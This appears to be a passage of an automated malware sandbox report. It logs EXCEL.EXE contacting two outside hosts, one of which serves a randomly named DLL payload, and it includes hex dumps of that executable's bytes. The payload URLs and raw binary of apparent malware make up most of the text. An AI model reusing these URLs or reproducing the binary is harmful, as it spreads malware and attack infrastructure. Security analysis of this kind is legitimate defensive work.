Nov 13, 2022 19:27:04.754826069 CET	2097	IN	Data Raw: 71 65 f7 c7 85 c0 04 00 00 99 29 e8 64 c7 85 c4 04 00 00 1a 79 4f 32 c7 85 c8 04 00 00 1f 26 b8 38 c7 85 cc 04 00 00 e8 07 25 16 c7 85 d0 04 00 00 6e b9 7d 70 c7 85 d4 04 00 00 a8 62 e7 69 c7 85 d8 04 00 00 8a ad b0 09 c7 85 dc 04 00 00 d8 ae 13 Data Ascii: qe)dyO2&8%n}pbiFx16s1k8R%gG!_Kxm'@J-qhP V"\|'Lr-l
Nov 13, 2022 19:27:05.015528917 CET	2098	IN	Data Raw: 06 00 00 64 77 dc ad c7 85 c4 06 00 00 1d 33 a1 bf c7 85 c8 06 00 00 0a 88 2b fc c7 85 cc 06 00 00 16 5c 7b 70 c7 85 d0 06 00 00 d9 ed 2d f2 c7 85 d4 06 00 00 17 62 29 1a c7 85 d8 06 00 00 e6 04 15 47 c7 85 dc 06 00 00 34 6e 91 4c c7 85 e0 06 00 Data Ascii: dw3+\{p-b)G4nLvmd"o-@-Hga+{Pm\9Kc+^w".dw !vX
Nov 13, 2022 19:27:05.274247885 CET	2099	IN	Data Raw: 19 c7 85 c4 08 00 00 12 38 09 6f c7 85 c8 08 00 00 3f 2a 94 a9 c7 85 cc 08 00 00 1d bb ae 08 c7 85 d0 08 00 00 d6 30 6b 3d c7 85 d4 08 00 00 db 10 5b 70 c7 85 d8 08 00 00 db 55 70 31 c7 85 dc 08 00 00 ea 3e 01 1e c7 85 e0 08 00 00 3b 30 b2 a7 c7 Data Ascii: 8o?0k=[pUp1>;0hqw/DSd!D-`r:s8:{ugF!_,w! $@IDkSA@ hcu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49697	175.98.167.165	443	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	Direction	Data
2022-11-13 18:26:50 UTC	OUT	GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: datie-tw.com Connection: Keep-Alive
2022-11-13 18:26:50 UTC	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 13 Nov 2022 18:26:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.33
2022-11-13 18:26:50 UTC	IN	Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49701	41.63.0.22	443	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2022-11-13 18:26:58 UTC	0	OUT	GET /cgi-bin/WFFcGx/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: copunupo.ac.zm Connection: Keep-Alive
2022-11-13 18:26:58 UTC	0	IN	HTTP/1.1 200 OK Date: Sun, 13 Nov 2022 18:26:58 GMT Server: Apache Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Sun, 13 Nov 2022 18:26:58 GMT Content-Disposition: attachment; filename="o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO.dll" Content-Transfer-Encoding: binary Set-Cookie: 637136f299923=1668364018; expires=Sun, 13-Nov-2022 18:27:58 GMT; Max-Age=60; path=/ Last-Modified: Sun, 13 Nov 2022 18:26:58 GMT Content-Length: 433152 Connection: close Content-Type: application/x-msdownload
2022-11-13 18:26:58 UTC	1	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?lllllll/ll2ll"llllll*ll+ll,llRichlPEd
2022-11-13 18:26:58 UTC	8	IN	Data Raw: 00 fe 91 8e ac c7 85 7c 05 00 00 43 41 a9 4e c7 85 80 05 00 00 64 77 a0 94 c7 85 84 05 00 00 14 33 a8 05 c7 85 88 05 00 00 5c bf 2b f8 c7 85 8c 05 00 00 5e f8 0a b3 c7 85 90 05 00 00 06 ad 78 38 c7 85 94 05 00 00 6c 56 2d d7 c7 85 98 05 00 00 2c 77 20 4f c7 85 9c 05 00 00 f0 2c e9 41 c7 85 a0 05 00 00 65 13 c6 00 c7 85 a4 05 00 00 db 74 17 3e c7 85 a8 05 00 00 75 7e 16 ec c7 85 ac 05 00 00 04 20 27 cd c7 85 b0 05 00 00 16 7c 26 4e c7 85 b4 05 00 00 84 0a d2 b3 c7 85 b8 05 00 00 d5 b5 68 79 c7 85 bc 05 00 00 63 02 aa af c7 85 c0 05 00 00 21 7b c2 0a c7 85 c4 05 00 00 f3 2b 6e 85 c7 85 c8 05 00 00 b5 5d cb 87 c7 85 cc 05 00 00 53 64 56 ba c7 85 d0 05 00 00 d9 c7 57 65 c7 85 d4 05 00 00 55 bb a2 08 c7 85 d8 05 00 00 5c a3 9c 20 c7 85 dc 05 00 00 b2 30 c2 7c Data Ascii: \|CANdw3\+^x8lV-,w O,Aet>u~ '\|&Nhyc!{+n]SdVWeU\ 0\|
2022-11-13 18:26:58 UTC	8	IN	Data Raw: 05 00 00 76 b1 06 cf c7 85 f4 05 00 00 5c 2c d3 f8 c7 85 f8 05 00 00 10 1f 1f ee c7 85 fc 05 00 00 28 e8 22 c5 c7 85 00 06 00 00 96 11 6b 30 c7 85 04 06 00 00 5d cf 4c 0b c7 85 08 06 00 00 80 ce 5a 31 c7 85 0c 06 00 00 ee 15 23 6c c7 85 10 06 00 00 ad 30 32 9a c7 85 14 06 00 00 40 6f 16 0e c7 85 18 06 00 00 3d d9 85 0c c7 85 1c 06 00 00 ac a5 1e ce c7 85 20 06 00 00 a4 f7 6e 65 c7 85 24 06 00 00 20 c5 22 c9 c7 85 28 06 00 00 0b 4c 4b 30 c7 85 2c 06 00 00 61 b8 03 b5 c7 85 30 06 00 00 06 01 48 1f c7 85 34 06 00 00 ea 02 05 7f c7 85 38 06 00 00 0b f1 75 6f c7 85 3c 06 00 00 5a 20 e9 cc c7 85 40 06 00 00 3c d9 85 bb c7 85 44 06 00 00 84 2d d5 f6 c7 85 48 06 00 00 6c 3e d4 a1 c7 85 4c 06 00 00 5d 79 e1 4f c7 85 50 06 00 00 17 ed aa 01 c7 85 54 06 00 00 55 34 Data Ascii: v\,("k0]LZ1#l02@o= ne$ "(LK0,a0H48uo<Z @<D-Hl>L]yOPTU4
2022-11-13 18:26:58 UTC	16	IN	Data Raw: 48 8b 0c 11 48 0f c8 48 0f c9 48 3b c1 1b c0 83 d8 ff c3 cc e9 8f 19 00 00 cc cc cc e9 67 1a 00 00 cc cc cc 48 8d 05 19 dc 01 00 48 89 01 e9 e9 19 00 00 cc 48 89 5c 24 08 57 48 83 ec 20 48 8d 05 ff db 01 00 8b da 48 8b f9 48 89 01 e8 ca 19 00 00 f6 c3 01 74 08 48 8b cf e8 b5 ff ff ff 48 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc e9 eb 1b 00 00 cc cc cc e9 3f 1b 00 00 cc cc cc 48 83 ec 28 48 8b c2 48 8d 51 11 48 8d 48 11 e8 e8 0c 00 00 85 c0 0f 94 c0 48 83 c4 28 c3 cc cc 48 83 ec 28 48 8b c2 48 8d 51 11 48 8d 48 11 e8 c8 0c 00 00 85 c0 0f 95 c0 48 83 c4 28 c3 cc cc 48 83 ec 28 48 8b c2 48 8d 51 11 48 8d 48 11 e8 a8 0c 00 00 33 c9 85 c0 0f 9f c1 8b c1 48 83 c4 28 c3 cc cc 48 8d 41 10 c3 cc cc cc 48 8d 05 51 db 01 00 48 89 01 48 8b c1 c3 cc cc 48 8b c1 Data Ascii: HHHH;gHHH\$WH HHHtHHH\$0H _?H(HHQHHH(H(HHQHHH(H(HHQHH3H(HAHQHHH
2022-11-13 18:26:58 UTC	24	IN	Data Raw: 00 00 80 77 08 85 c0 75 27 3b fe 76 23 e8 22 0c 00 00 c7 00 22 00 00 00 40 f6 c5 01 74 05 83 cf ff eb 0d 40 8a c5 24 02 f6 d8 1b ff f7 df 03 fe 4d 85 ed 74 04 49 89 5d 00 40 f6 c5 02 74 02 f7 df 8b c7 48 8b 5c 24 70 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 45 33 c9 e9 10 fe ff ff 45 33 c9 e9 08 fe ff ff 41 b9 01 00 00 00 e9 fd fd ff ff cc 41 b9 01 00 00 00 e9 f1 fd ff ff cc 40 53 48 83 ec 20 48 8b d9 c6 41 18 00 48 85 d2 75 7f e8 61 14 00 00 48 89 43 10 48 8b 90 c0 00 00 00 48 89 13 48 8b 88 b8 00 00 00 48 89 4b 08 48 3b 15 05 17 06 00 74 16 8b 80 c8 00 00 00 85 05 c7 12 06 00 75 08 e8 68 a7 00 00 48 89 03 48 8b 05 b6 11 06 00 48 39 43 08 74 1b 48 8b 43 10 8b 88 c8 00 00 00 85 0d a0 12 06 00 75 09 e8 21 9e 00 00 48 89 43 08 48 8b 43 10 f6 80 c8 00 Data Ascii: wu';v#""@t@$MtI]@tH\$pH A_A^A]A\_^]E3E3AA@SH HAHuaHCHHHHKH;tuhHHH9CtHCu!HCHC
2022-11-13 18:26:59 UTC	32	IN	Data Raw: 54 48 83 ec 40 ff 15 09 98 01 00 45 33 e4 48 8b f8 48 85 c0 0f 84 a9 00 00 00 48 8b d8 66 44 39 20 74 14 48 83 c3 02 66 44 39 23 75 f6 48 83 c3 02 66 44 39 23 75 ec 4c 89 64 24 38 48 2b d8 4c 89 64 24 30 48 d1 fb 4c 8b c0 33 d2 44 8d 4b 01 33 c9 44 89 64 24 28 4c 89 64 24 20 ff 15 ba 97 01 00 48 63 e8 85 c0 74 51 48 8b cd e8 97 ef ff ff 48 8b f0 48 85 c0 74 41 4c 89 64 24 38 4c 89 64 24 30 44 8d 4b 01 4c 8b c7 33 d2 33 c9 89 6c 24 28 48 89 44 24 20 ff 15 7f 97 01 00 85 c0 75 0b 48 8b ce e8 7f da ff ff 49 8b f4 48 8b cf ff 15 6f 97 01 00 48 8b c6 eb 0b 48 8b cf ff 15 61 97 01 00 33 c0 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 48 8b 7c 24 68 48 83 c4 40 41 5c c3 48 89 5c 24 08 57 48 83 ec 20 48 8d 1d c3 aa 05 00 48 8d 3d bc aa 05 00 eb 0e 48 8b 03 48 85 Data Ascii: TH@E3HHHfD9 tHfD9#uHfD9#uLd$8H+Ld$0HL3DK3Dd$(Ld$ HctQHHHtALd$8Ld$0DKL33l$(HD$ uHIHoHHa3H\$PHl$XHt$`H\|$hH@A\H\$WH HH=HH
2022-11-13 18:26:59 UTC	40	IN	Data Raw: e8 7b fc ff ff eb 05 e8 50 fd ff ff 48 8b c3 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 83 39 00 41 8b f8 48 8b f2 48 8b d9 74 11 81 61 08 ff 00 ff ff 48 83 21 00 c6 41 08 03 eb 6d 48 85 d2 74 64 45 85 c0 74 5f 41 8b c8 45 33 c0 ff c9 48 8d 0d f4 f0 05 00 74 1e 41 8d 50 18 e8 b1 f4 ff ff 48 85 c0 74 30 44 8b c7 48 8b d6 48 8b c8 e8 be fd ff ff eb 22 ba 10 00 00 00 e8 92 f4 ff ff 48 85 c0 74 11 8a 0e 48 8d 15 d4 93 01 00 88 48 08 48 89 10 eb 02 33 c0 48 89 03 48 85 c0 75 0a c6 43 08 03 eb 04 c6 41 08 02 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 88 54 24 10 53 48 83 ec 20 48 83 21 00 c6 41 08 00 81 61 08 ff 00 ff ff 48 8b d9 84 d2 74 10 48 8d 54 24 38 41 b8 01 00 00 00 e8 25 ff ff ff 48 8b c3 48 83 c4 20 5b c3 40 53 48 Data Ascii: {PHH [H\$Ht$WH H9AHHtaH!AmHtdEt_AE3HtAPHt0DHH"HtHHH3HHuCAH\$0Ht$8H _T$SH H!AaHtHT$8A%HH [@SH
2022-11-13 18:26:59 UTC	48	IN	Data Raw: 08 d3 05 00 48 2b c7 48 83 f8 01 7e 16 48 8b 0d f0 d2 05 00 83 39 09 74 0a 48 8d 54 24 20 e8 f5 de ff ff 48 8d 54 24 20 48 8b cb e8 e4 e4 ff ff 80 7b 08 00 0f 84 0f fe ff ff c6 05 f4 d2 05 00 00 48 8b c3 48 8b 4d 47 48 33 cc e8 cc 81 ff ff 4c 8d 9c 24 00 01 00 00 49 8b 5b 18 49 8b 73 20 49 8b 7b 28 49 8b e3 5d c3 cc cc cc 48 8b c4 48 89 58 08 48 89 70 10 48 89 78 20 4c 89 40 18 55 48 8d 68 a1 48 81 ec f0 00 00 00 48 8b 1d 7a d2 05 00 45 33 c0 48 8b f9 0f be 03 b9 00 00 ff ff 48 ff c3 21 4d 9f 21 4d 8f 4c 89 45 97 4c 89 45 87 41 8b f0 48 89 1d 51 d2 05 00 83 f8 41 0f 8f b7 01 00 00 0f 84 a1 06 00 00 85 c0 0f 84 90 01 00 00 83 f8 2f 0f 8e bf 02 00 00 83 f8 31 7e 5f 83 f8 39 0f 8f b1 02 00 00 48 0f be 53 ff 48 8d 1d a7 37 ff ff 48 8b 94 d3 00 39 02 00 48 8d Data Ascii: H+H~H9tHT$ HT$ H{HHMGH3L$I[Is I{(I]HHXHpHx L@UHhHHzE3HH!M!MLELEAHQA/1~_9HSH7H9H
2022-11-13 18:26:59 UTC	56	IN	Data Raw: ff 0f 10 6d d0 f3 0f 7f 2f 40 84 f6 74 30 48 8d 8d b0 00 00 00 b2 5b e8 28 c2 ff ff 48 8d 4c 24 40 48 8b d7 0f 10 00 f3 0f 7f 44 24 40 e8 e2 c4 ff ff 0f 10 6c 24 40 40 32 f6 f3 0f 7f 2f 48 8b 05 c7 b2 05 00 80 38 3f 0f 85 38 02 00 00 48 ff c0 48 89 05 b4 b2 05 00 0f be 08 83 e9 24 0f 84 ed 01 00 00 ff c9 0f 84 8f 01 00 00 83 e9 1a 0f 84 c0 00 00 00 83 e9 02 0f 84 7d 01 00 00 83 f9 08 74 69 48 8d 4d 40 33 d2 e8 3a cb ff ff 48 8d 8d 80 00 00 00 b2 60 48 8b d8 e8 a5 c1 ff ff 48 8d 4d f0 48 8b d0 e8 b9 b6 ff ff 48 8d 4d f0 48 8b d3 e8 5d c4 ff ff 48 8d 4c 24 60 b2 27 0f 28 6d f0 66 0f 7f 6c 24 60 e8 2b c7 ff ff 48 8d 4d e0 48 8b d7 0f 28 6c 24 60 66 0f 7f 6d e0 e8 31 c4 ff ff 0f 28 6d e0 e9 c3 01 00 00 48 ff 05 19 b2 05 00 48 8d 4d 60 45 33 c0 b2 01 e8 7b e8 Data Ascii: m/@t0H[(HL$@HD$@l$@@2/H8?8HH$}tiHM@3:H`HHMHHMH]HL$`'(mfl$`+HMH(l$`fm1(mHHM`E3{
2022-11-13 18:26:59 UTC	63	IN	Data Raw: 0f 82 de fe ff ff 8d 50 46 66 3b ca 72 53 8d 42 0a 66 3b c8 0f 82 ca fe ff ff ba 40 10 00 00 66 3b ca 72 3d 8d 42 0a 66 3b c8 0f 82 b4 fe ff ff ba e0 17 00 00 66 3b ca 72 27 8d 42 0a 66 3b c8 0f 82 9e fe ff ff 8d 50 26 66 3b ca 72 13 8d 42 0a eb 05 b8 1a ff 00 00 66 3b c8 0f 82 83 fe ff ff 83 c8 ff c3 cc cc cc 66 89 4c 24 08 53 48 83 ec 20 b8 ff ff 00 00 0f b7 da 66 3b c8 75 04 33 c0 eb 45 b8 00 01 00 00 66 3b c8 73 10 48 8b 05 f8 7d 05 00 0f b7 c9 0f b7 04 48 eb 26 b9 01 00 00 00 4c 8d 4c 24 40 48 8d 54 24 30 44 8b c1 ff 15 e7 19 01 00 33 c9 85 c0 74 05 0f b7 4c 24 40 0f b7 c1 0f b7 cb 23 c1 48 83 c4 20 5b c3 cc cc e9 93 ff ff ff cc cc cc e9 8b ff ff ff cc cc cc 48 8b c1 c3 81 e9 a4 03 00 00 74 23 83 e9 04 74 18 83 e9 0d 74 0d ff c9 74 03 33 c0 c3 b8 04 Data Ascii: PFf;rSBf;@f;r=Bf;f;r'Bf;P&f;rBf;fL$SH f;u3Ef;sH}H&LL$@HT$0D3tL$@#H [Ht#ttt3
2022-11-13 18:26:59 UTC	71	IN	Data Raw: e8 73 59 ff ff 48 05 a8 00 00 00 48 83 c4 28 c3 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 54 48 83 ec 30 48 8b f2 8b f9 45 33 e4 48 83 fa 04 0f 84 53 02 00 00 48 83 fa 03 0f 84 49 02 00 00 83 f9 02 0f 84 15 01 00 00 83 f9 15 0f 84 0c 01 00 00 83 f9 16 0f 84 03 01 00 00 83 f9 06 0f 84 fa 00 00 00 83 f9 0f 0f 84 f1 00 00 00 83 f9 08 74 0e 83 f9 04 74 09 83 f9 0b 0f 85 09 02 00 00 e8 6e 58 ff ff 4c 8b e0 48 85 c0 0f 84 f8 01 00 00 48 8d 1d b3 0c 01 00 48 39 98 a0 00 00 00 75 2f 48 63 0d 6b 0d 01 00 e8 5a 52 ff ff 49 89 84 24 a0 00 00 00 48 85 c0 0f 84 cb 01 00 00 4c 63 05 4e 0d 01 00 48 8b d3 48 8b c8 e8 cb 24 ff ff 49 8b 8c 24 a0 00 00 00 48 8b d1 4c 63 05 35 0d 01 00 39 7a 04 74 13 48 83 c2 10 49 8b c0 48 c1 e0 04 48 03 c1 48 3b d0 72 e8 49 8b c0 48 Data Ascii: sYHH(H\$Ht$H\|$ATH0HE3HSHIttnXLHHH9u/HckZRI$HLcNHH$I$HLc59ztHIHHH;rIH
2022-11-13 18:26:59 UTC	79	IN	Data Raw: 44 24 30 48 8d 44 24 40 48 8b d7 48 8b ce c6 44 24 28 01 48 89 44 24 20 e8 1f f5 ff ff 48 8b 4c 24 70 48 33 cc e8 f2 04 ff ff 48 81 c4 80 00 00 00 41 5c 5f 5e 5d 5b c3 48 83 ec 38 8b 44 24 60 48 83 64 24 28 00 89 44 24 20 e8 b5 fe ff ff 48 83 c4 38 c3 48 83 ec 38 41 83 f9 65 74 6a 41 83 f9 45 74 64 41 83 f9 66 75 16 48 8b 44 24 70 44 8b 4c 24 60 48 89 44 24 20 e8 9e fd ff ff eb 64 41 83 f9 61 74 24 41 83 f9 41 74 1e 48 8b 44 24 70 44 8b 4c 24 60 48 89 44 24 28 8b 44 24 68 89 44 24 20 e8 5c fe ff ff eb 3a 48 8b 44 24 70 44 8b 4c 24 60 48 89 44 24 28 8b 44 24 68 89 44 24 20 e8 be f7 ff ff eb 1c 48 8b 44 24 70 44 8b 4c 24 60 48 89 44 24 28 8b 44 24 68 89 44 24 20 e8 8c f6 ff ff 48 83 c4 38 c3 cc cc cc 48 83 ec 48 8b 44 24 78 48 83 64 24 30 00 89 44 24 28 8b Data Ascii: D$0HD$@HHD$(HD$ HL$pH3HA\_^][H8D$`Hd$(D$ H8H8AetjAEtdAfuHD$pDL$`HD$ dAat$AAtHD$pDL$`HD$(D$hD$ \:HD$pDL$`HD$(D$hD$ HD$pDL$`HD$(D$hD$ H8HHD$xHd$0D$(
2022-11-13 18:26:59 UTC	87	IN	Data Raw: 48 8b 8b 78 01 00 00 e8 9c ff fe ff 48 8b 8b 80 01 00 00 e8 90 ff fe ff 48 8b 8b 88 01 00 00 e8 84 ff fe ff 48 8b 8b 90 01 00 00 e8 78 ff fe ff 48 8b 8b 98 01 00 00 e8 6c ff fe ff 48 8b 8b 68 01 00 00 e8 60 ff fe ff 48 8b 8b a8 01 00 00 e8 54 ff fe ff 48 8b 8b b0 01 00 00 e8 48 ff fe ff 48 8b 8b b8 01 00 00 e8 3c ff fe ff 48 8b 8b c0 01 00 00 e8 30 ff fe ff 48 8b 8b c8 01 00 00 e8 24 ff fe ff 48 8b 8b d0 01 00 00 e8 18 ff fe ff 48 8b 8b a0 01 00 00 e8 0c ff fe ff 48 8b 8b d8 01 00 00 e8 00 ff fe ff 48 8b 8b e0 01 00 00 e8 f4 fe fe ff 48 8b 8b e8 01 00 00 e8 e8 fe fe ff 48 8b 8b f0 01 00 00 e8 dc fe fe ff 48 8b 8b f8 01 00 00 e8 d0 fe fe ff 48 8b 8b 00 02 00 00 e8 c4 fe fe ff 48 8b 8b 08 02 00 00 e8 b8 fe fe ff 48 8b 8b 10 02 00 00 e8 ac fe fe ff 48 8b 8b Data Ascii: HxHHHxHlHh`HTHHH<H0H$HHHHHHHHHHH
2022-11-13 18:26:59 UTC	94	IN	Data Raw: c2 75 57 49 ff c8 74 4e 84 c0 74 4a 48 f7 c1 07 00 00 00 75 e1 4a 8d 14 09 66 81 e2 ff 0f 66 81 fa f8 0f 77 d1 48 8b 01 4a 8b 14 09 48 3b c2 75 c5 48 83 c1 08 49 83 e8 08 49 ba ff fe fe fe fe fe fe 7e 76 11 48 83 f0 ff 4c 03 d2 49 33 c2 49 85 c3 74 c1 eb 0c 48 33 c0 c3 48 1b c0 48 83 d8 ff c3 84 d2 74 27 84 f6 74 23 48 c1 ea 10 84 d2 74 1b 84 f6 74 17 48 c1 ea 10 84 d2 74 0f 84 f6 74 0b c1 ea 10 84 d2 74 04 84 f6 75 88 48 33 c0 c3 cc cc cc 48 83 ec 38 48 8b 05 1d ed 04 00 48 33 c4 48 89 44 24 20 8a 02 45 33 db 4c 8b d2 4c 89 1c 24 4c 89 5c 24 08 4c 89 5c 24 10 4c 89 5c 24 18 4c 8b c9 eb 21 44 0f b6 c0 0f b6 c0 ba 01 00 00 00 83 e0 07 49 c1 e8 03 8a c8 d2 e2 42 08 14 04 49 ff c2 41 8a 02 84 c0 75 db eb 1e 41 0f b6 c8 41 0f b6 c0 ba 01 00 00 00 83 e1 07 48 Data Ascii: uWItNtJHuJffwHJH;uHII~vHLI3ItH3HHt't#HttHtttuH3H8HH3HD$ E3LL$L\$L\$L\$L!DIBIAuAAH
2022-11-13 18:26:59 UTC	102	IN	Data Raw: 83 a0 c8 00 00 00 fd b8 ff ff ff 7f eb 6b 48 85 ff 74 d3 48 8b 45 e0 83 78 14 00 75 1e 48 8b d7 48 8b ce e8 54 ff ff ff 80 7d f8 00 74 4b 48 8b 4d f0 83 a1 c8 00 00 00 fd eb 3e 48 2b f7 0f b6 0c 3e 48 8d 55 e0 e8 81 ee ff ff 0f b6 0f 48 8d 55 e0 8b d8 e8 73 ee ff ff 48 ff c7 85 db 74 04 3b d8 74 da 2b d8 80 7d f8 00 74 0b 48 8b 4d f0 83 a1 c8 00 00 00 fd 8b c3 48 8b 5c 24 50 48 8b 74 24 58 48 8b 7c 24 60 48 83 c4 40 5d c3 cc cc 48 83 ec 28 83 3d 89 f7 04 00 00 75 2d 48 85 c9 75 1a e8 0d d3 fe ff c7 00 16 00 00 00 e8 ae f0 fe ff b8 ff ff ff 7f 48 83 c4 28 c3 48 85 d2 74 e1 48 83 c4 28 e9 b2 fe ff ff 45 33 c0 48 83 c4 28 e9 e2 fe ff ff cc cc 4c 8b d1 4d 85 c0 74 3b 45 0f b6 0a 49 ff c2 41 8d 41 bf 83 f8 19 77 04 41 83 c1 20 0f b6 0a 48 ff c2 8d 41 bf 83 f8 Data Ascii: kHtHExuHHT}tKHM>H+>HUHUsHt;t+}tHMH\$PHt$XH\|$`H@]H(=u-HuH(HtH(E3H(LMt;EIAAwA HA
2022-11-13 18:26:59 UTC	110	IN	Data Raw: 00 66 3b c2 0f 83 70 02 00 00 ba fd bf 00 00 66 44 3b ca 0f 87 61 02 00 00 ba bf 3f 00 00 66 44 3b ca 77 0c 4d 89 70 04 45 89 30 e9 62 02 00 00 ba ff ff ff 7f 41 bd 01 00 00 00 66 85 c9 75 24 66 45 03 cd 66 44 89 4d d0 41 85 50 08 75 15 45 39 70 04 75 0f 45 39 30 75 0a 66 45 89 70 0a e9 2e 02 00 00 66 85 c0 75 1d 66 45 03 cd 66 44 89 4d d0 41 85 54 24 08 75 0d 45 39 74 24 04 75 06 45 39 34 24 74 9e 41 8b de 48 8d 4d e4 ba 05 00 00 00 4d 8b cd 8d 04 1b 44 8b ea 4c 63 d0 85 d2 7e 57 8b f3 4f 8d 3c 02 4d 8d 74 24 08 41 23 f1 45 33 c0 41 0f b7 06 45 0f b7 17 41 8b f8 44 0f af d0 8b 41 fc 46 8d 1c 10 44 3b d8 72 05 45 3b da 73 03 41 8b f9 44 89 59 fc 85 ff 74 04 66 44 01 09 45 2b e9 49 83 c7 02 49 83 ee 02 45 85 ed 7f c1 4c 8b 45 d8 45 33 f6 41 2b d1 48 83 c1 Data Ascii: f;pfD;a?fD;wMpE0bAfu$fEfDMAPuE9puE90ufEp.fufEfDMAT$uE9t$uE94$tAHMMDLc~WO<Mt$A#E3AEADAFD;rE;sADYtfDE+IIELEE3A+H
2022-11-13 18:26:59 UTC	118	IN	Data Raw: 48 8b f9 e8 88 6e fe ff f6 c3 01 74 08 48 8b cf e8 ff 68 fe ff 48 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 cc 48 89 5c 24 08 57 48 83 ec 20 8b da 48 8b f9 e8 58 6e fe ff f6 c3 01 74 08 48 8b cf e8 cf 68 fe ff 48 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 cc 48 89 5c 24 08 57 48 83 ec 20 8b da 48 8b f9 e8 28 6e fe ff f6 c3 01 74 08 48 8b cf e8 9f 68 fe ff 48 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 cc 40 53 48 83 ec 20 48 8b d9 e8 f6 6e fe ff 4c 8d 1d 43 7a 00 00 4c 89 1b 48 8b c3 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 20 48 8b d9 e8 d2 6e fe ff 4c 8d 1d 7f 7a 00 00 4c 89 1b 48 8b c3 48 83 c4 20 5b c3 cc ff 25 dc 3e 00 00 ff 25 de 3e 00 00 ff 25 e0 3e 00 00 ff 25 e2 3e 00 00 ff 25 e4 3e 00 00 ff 25 e6 3e 00 00 ff 25 e8 3e 00 00 ff 25 ea 3e 00 00 ff 25 ec 3e 00 Data Ascii: HntHhHH\$0H _H\$WH HXntHhHH\$0H _H\$WH H(ntHhHH\$0H _@SH HnLCzLHH [@SH HnLzLHH [%>%>%>%>%>%>%>%>%>
2022-11-13 18:26:59 UTC	126	IN	Data Raw: 4c 24 50 0f 83 2b 01 00 00 48 8d 78 0c 4c 8d 6f f4 45 3b 65 00 0f 8c 02 01 00 00 44 3b 67 f8 0f 8f f8 00 00 00 e8 a6 e4 ff ff 48 63 0f 48 8d 14 89 48 63 4f 04 48 8d 14 91 83 7c 10 f0 00 74 23 e8 8b e4 ff ff 48 63 0f 48 8d 14 89 48 63 4f 04 48 8d 14 91 48 63 5c 10 f0 e8 72 e4 ff ff 48 03 c3 eb 02 33 c0 48 85 c0 74 46 e8 61 e4 ff ff 48 63 0f 48 8d 14 89 48 63 4f 04 48 8d 14 91 83 7c 10 f0 00 74 23 e8 46 e4 ff ff 48 63 0f 48 8d 14 89 48 63 4f 04 48 8d 14 91 48 63 5c 10 f0 e8 2d e4 ff ff 48 03 c3 eb 02 33 c0 80 78 10 00 75 66 e8 1b e4 ff ff 48 63 0f 48 8d 14 89 48 63 4f 04 48 8d 14 91 f6 44 10 ec 40 75 4b e8 00 e4 ff ff 8b 0f 4c 8b 84 24 b0 00 00 00 ff c9 c6 44 24 40 00 4c 89 6c 24 38 48 83 64 24 30 00 48 63 c9 4d 8b ce 48 8d 14 89 48 8d 0c 90 48 63 47 04 49 Data Ascii: L$P+HxLoE;eD;gHcHHcOH\|t#HcHHcOHHc\rH3HtFaHcHHcOH\|t#FHcHHcOHHc\-H3xufHcHHcOHD@uKL$D$@Ll$8Hd$0HcMHHHcGI
